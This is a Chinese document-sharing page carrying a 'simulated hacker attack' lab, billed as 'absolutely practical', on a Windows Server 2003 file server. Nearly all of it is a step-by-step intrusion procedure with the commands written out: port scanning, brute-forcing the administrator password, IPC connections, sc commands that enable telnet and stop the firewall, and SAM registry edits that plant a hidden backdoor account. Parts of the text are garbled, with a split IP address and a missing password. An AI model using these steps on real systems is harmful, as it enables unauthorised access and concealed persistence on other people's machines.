黑客攻击实例大全(超经典,绝对实用)

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

模拟黑客攻击

一、实验环境

本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了Windows Server 2003,启动了Windows防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。

二、需求描述

扫描目标主机

获得管理员权限

安装后门

清除攻击记录

三、实验拓扑

四、实验步骤

扫描目标主机

1.使用扫描软件扫描目标计算机,确认开放的端口,判断操作系统的类型。

2.扫描软件推荐使用X-Scan或流光。

获得管理权限

1.根据扫描结果,尝试暴力破解管理员账户和密码。

2.破解后自动生成报告。

入侵目标计算机

1.使用管理员的账号建立IPC链接,命令为“net use \\19

2.168.10.11 123456

/user:administrator”.

使用sc命令获取目标计算机的所有服务列表,并保存在本地。命令为“sc\\192.168.10.11 query type= service state= all >c:\1.txt”(注意:两个“=”前无空格,“=”后有空格)。“>c:\1.txt”表示将输出结果保存在本地C盘的1.txt文件内。

2.打开1.txt文件,找到telnet,确认服务的状态,telnet服务默认为禁用状态。如果知道

telnet服务的服务名称,可直接使用命令行查看,命令为“sc \\192.168.10.11 qc tlntsvr”.

3.去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\192.168.10.11 config tlntsvr

start= auto”。然后启用telnet服务,命令为“sc \\192.168.10.11 start tlntsvr”.

4.停用目标计算机的Windows防火墙,命令为“sc \\192.168.10.11 stop SharedAccess”,

防火墙的服务名可通过前面保存的1.txt文件查找。如果不停止Windows防火墙将无法使用telnet管理目标计算机。

5.确认目标计算机启用了远程注册表服务,命令为“sc \\192.168.10.11 qc remoteregistry”。

如果该服务为停止状态,则将其启动。

添加隐藏账户

1.建立telnet连接,管理目标计算机,命令为“telnet 19

2.168.10.11”。连接成功后输入管

理员的账户名和密码。

2.通过telnet,在目标计算机上建立隐藏账户,命令为“net user snasda$ 12

/add”.

其中“snasda$”是用户名,“”是密码。“$”符号用于在命令行里隐藏账户,但是在图形化管理工具里该账户还是可见的。

3.在本地运行“regedt32”,在“注册表编辑器”中选择“文件”—“连接网络注册表”,

在选择计算机的窗口中输入目标计算机地址,并提供目标计算机的用户名和密码,单击“确定”按钮。

4.打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE”项下“SAM”子项下的“SAM”

子项,选择“权限”。

5.在SAM权限窗口中,赋予管理员组完全控制权限。断开与目标计算机注册表的连接,

然后重新建立连接。

6.展开目标计算机的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”

项,找到“Administrator”和新建的账户“snasda$”,记录他们的类型,本例中

“Administrator”的类型为“0x1f4”,“snasda$”的类型为“0x3eb”。

7.展开目标计算机“HKEY_LOCAL_MACHINE\SAM\SAM\Domain\Account\Users”项下后三

位是1f4的子项,该项和Administrator相对应。

8.双击右侧窗格1f4项下的F键值,复制F键值下的全部数据。

9.展开目标主机“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users”项下后三位

是3EB的子项。使用从1F4项复制的数据覆盖3EB项F键值的数据。

10.导出目标计算机注册表的snasda$项和000003EB项保存到本地,分别命名为snasda.reg

和3eb.reg,然后将snasda.reg和3eb.reg拷贝到\\192.168.10.11\C$下。

11.将目标计算机的c$映射到为本地计算机Z盘。

12.将文件snasda.reg和3eb.reg复制到驱动器Z盘中。

13.返回到telnet命令行下,删除目标计算机账户snasda$,命令为“net user snasda$ /delete”.

14.在目标计算机上导入snasda和3eb.reg,命令为“reg import snasda.reg”和“reg import

3eb.reg”。完成本步后将真正的在目标计算机上建立一个隐藏账户,使用命令行或图形工具都不能看见该账户,但是在注册表中可以看见。

15.删除目前和目标计算机的IPC连接,命令为“net use \\192.168.10.11 /del”,使用新建的

隐藏账户建立IPC连接,测试该账户是否建立正确并有足够的权限。

16.打开目标计算机的注册表,右击“HKEY_LOCAL_MACHINE”项下“SAM”子项下的“SAM”

子项,选择“权限”。去除管理员组的读取和完全控制权限,恢复到默认状态。

相关文档
最新文档